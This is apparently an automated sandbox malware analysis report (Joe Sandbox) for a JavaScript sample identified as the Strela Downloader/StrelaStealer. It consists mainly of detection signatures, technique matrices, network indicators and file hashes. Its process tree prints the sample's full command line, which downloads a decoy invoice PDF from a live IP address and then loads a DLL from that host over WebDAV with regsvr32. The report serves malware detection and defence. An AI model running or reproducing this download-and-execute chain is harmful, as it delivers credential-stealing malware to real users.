Windows
Analysis Report
2920450291176811805.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7612 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\29204 5029117681 1805.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7700 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user~1 \AppData\L ocal\Temp\ invoice.pd f http://1 93.143.1.2 05/invoice .php"&&sta rt C:\User s\user~1\A ppData\Loc al\Temp\in voice.pdf& &cmd /c ne t use \\19 3.143.1.20 5@8888\dav wwwroot\&& cmd /c reg svr32 /s \ \193.143.1 .205@8888\ davwwwroot \311362243 019638.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7708 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7744 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user~1\Ap pData\Loca l\Temp\inv oice.pdf h ttp://193. 143.1.205/ invoice.ph p" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 7940 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user ~1\AppData \Local\Tem p\invoice. pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7192 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 360 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=20 68 --field -trial-han dle=1644,i ,166450196 7783257833 4,59967187 3387242542 7,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 6364 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: frack113, Nasreddine Bencherchali: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | Script-JS.Trojan.StrelaStealer | ||
7% | Virustotal | Browse |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588625 |
Start date and time: | 2025-01-11 03:21:58 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 16s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 2920450291176811805.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/63@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 104.40.149.189, 184.28.88.176, 172.64.41.3, 162.159.61.3, 184.28.90.27, 199.232.214.172, 23.209.209.135, 2.16.168.107, 2.16.168.105, 23.200.0.34, 23.200.0.33, 23.200.0.32, 23.200.0.29, 23.200.0.23, 192.168.2.7, 13.107.246.45, 20.12.23.50, 54.224.241.105, 23.217.172.185
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, twc.trafficmanager.net, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, azureedge-t-prod.trafficmanager.net, geo2.adobe.com
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
21:23:12 | API Interceptor | |
21:23:18 | API Interceptor | |
21:23:19 | API Interceptor | |
21:23:27 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7066943662649309 |
Encrypted: | false |
SSDEEP: | 1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqP:2JIB/wUKUKQncEmYRTwh0D |
MD5: | 88852B9D77F596745BEF2F50B5B7A0A5 |
SHA1: | BC8CBE32494A7A881E0EC0053078F46C4647F030 |
SHA-256: | 4B6753590D2F244879CBCCE92963BA18AD6BB1ABC28B8AFB9CDE81BCD1739F2D |
SHA-512: | BA83AFA8F36BB533D198A273C042D4243685E8CB17896C332684F74DB42303989E611091D973C40E2CA8DB53A26991AB926B5A61D4C1C843DBA49BB10A48B5F0 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7899849901218325 |
Encrypted: | false |
SSDEEP: | 1536:zSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:zazaPvgurTd42UgSii |
MD5: | 0C063FBBEC836FDA46F79D4097E37F9B |
SHA1: | 978283058B2A0E0C0BB78E117101EE744FA08900 |
SHA-256: | 256F49FE82169A8FC3AD3DE5DF6AF8A9F237E9F5E42E838DC47A9DD4B890FE98 |
SHA-512: | 133F912873B2EA470D3BFA257DF3F8CD08AA48AB5236EC554E6F745ABBF27FE0EB30F6DCA95D2DE446D1B6AAD197D859F49A99E26EA064EFBDB7396A3374ADC6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08244686514367672 |
Encrypted: | false |
SSDEEP: | 3:ZYeBXkYorp1t/57Dek3Jse2yprXAllEqW3l/TjzzQ/t:ZzBXkYwHR3tscVAmd8/ |
MD5: | B9BA888A4C5BA4036A3146A6EC6CAB94 |
SHA1: | BEC4856F80F128FC5E980432D48634B12AF8053C |
SHA-256: | 446724FE06A8285514C0248C9DB5063161F30A8BAD7BCF2703E9D7D16FA753D2 |
